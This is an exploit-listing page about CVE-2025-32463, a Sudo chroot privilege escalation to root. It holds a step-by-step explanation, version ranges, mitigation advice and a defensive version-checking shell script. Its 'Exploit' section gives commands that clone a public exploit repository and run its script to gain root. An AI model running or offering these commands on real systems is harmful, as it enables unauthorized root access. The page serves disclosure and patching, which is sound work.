## https://sploitus.com/exploit?id=6C460879-71C5-559E-A79C-4FC25D8B115D
# CVE-2025-32463 Local Privilege Escalation to Root via Sudo chroot in Linux
Here's a summary of **CVE-2025-32463** without links:
---
### Vulnerability Overview
**CVE-2025-32463** is a **local privilege escalation** vulnerability in **Sudo** versions **1.9.14 through 1.9.17**. It abuses the `--chroot` (`-R`) option by manipulating how Sudo handles `nsswitch.conf`. This allows a local attacker to trick Sudo into loading a **malicious shared library**, gaining **root access**, even if they aren't in the `sudoers` file.
---
### Severity
* **CVSS 3.1 Score**: 9.3 (Critical)
* **Attack Vector**: Local
* **Privileges Required**: None
* **User Interaction**: None
---
### Exploit
```
# Clone as the unprivileged user; git names the directory after the repository
git clone https://github.com/B1ack4ash/Blackash-CVE-2025-32463.git
cd Blackash-CVE-2025-32463
chmod +x CVE-2025-32463.sh
id
./CVE-2025-32463.sh
id
```
---
### How the Exploit Works
1. The attacker runs a command like `sudo -R /fake-dir some-command`.
2. Inside `/fake-dir`, they place a fake `etc/nsswitch.conf` that forces Sudo to resolve users or groups via a custom method.
3. This tricks Sudo into loading and executing a **malicious shared library**, leading to **code execution as root**.
---
### Affected Systems
* Any Linux/Unix-like system running **Sudo 1.9.14 to 1.9.17**
* Systems allowing local shell access (even with no sudo privileges)
* Includes major distributions like Ubuntu, Debian, Red Hat, Fedora, SUSE, Alpine, etc.
---
### Fixed In
* **Sudo 1.9.17p1** and newer
* Older versions **before 1.9.14** are not affected (they lack the vulnerable chroot feature)
---
### Mitigation Steps
1. **Check your version** using `sudo --version`
2. **Update Sudo** to 1.9.17p1 or the latest available version
3. Avoid using the `--chroot` option unless necessary
4. Monitor logs for unusual sudo or NSS behavior
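
Step 1 as a script: an added example (not part of the original README or the Sudo project) that classifies an upstream version string against the range given on this page. The function names and sample version strings are constructed for illustration, and the parsing assumes the `Sudo version X.Y.ZpN` format printed by `sudo --version`.

```sh
#!/bin/sh
# Added example: classify an upstream sudo version string against the range
# this page gives (affected 1.9.14 through 1.9.17, fixed in 1.9.17p1).
# Caveat: distribution packages can carry backported fixes without changing
# the upstream version string, so confirm against the vendor advisory.

classify_sudo_version() {
    ver=$1
    base=${ver%%p*}                             # "1.9.17p1" -> "1.9.17"
    patch=0
    case $ver in *p*) patch=${ver#*p} ;; esac   # "1.9.17p1" -> "1"
    case $base in
        *.*.*.*) echo unknown; return 0 ;;      # more than three components
        *.*.*)   ;;
        *)       echo unknown; return 0 ;;      # fewer than three components
    esac
    major=${base%%.*}
    micro=${base##*.}
    minor=${base#*.}; minor=${minor%.*}
    # Every component must be a non-empty run of digits.
    for part in "$major" "$minor" "$micro" "$patch"; do
        case $part in ''|*[!0-9]*) echo unknown; return 0 ;; esac
    done
    n=$((major * 10000 + minor * 100 + micro))
    if [ "$n" -lt 10914 ]; then
        echo not-affected                       # before 1.9.14
    elif [ "$n" -lt 10917 ]; then
        echo affected                           # 1.9.14 .. 1.9.16, any patch level
    elif [ "$n" -eq 10917 ] && [ "$patch" -lt 1 ]; then
        echo affected                           # 1.9.17 without a patch level
    else
        echo fixed                              # 1.9.17p1 and newer
    fi
}

installed_sudo_version() {
    sudo --version 2>/dev/null | sed -n '1s/^Sudo version \([^ ]*\).*/\1/p'
}

# Constructed sample version strings.
for v in 1.9.13p3 1.9.14 1.9.15p5 1.9.17 1.9.17p1; do
    printf '%-10s %s\n' "$v" "$(classify_sudo_version "$v")"
done

# The locally installed sudo, if there is one.
if command -v sudo >/dev/null 2>&1; then
    v=$(installed_sudo_version)
    printf 'installed %s: %s\n' "${v:-?}" "$(classify_sudo_version "$v")"
fi
```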
---
### Key Takeaway
Even if a user doesn't have sudo rights, they can potentially become root by abusing this bug. It's a critical issue affecting many systems, and it should be patched **immediately**.
---
### Disclaimer
This PoC is provided for educational and research purposes only. Running this on any system without permission is illegal and unethical!!!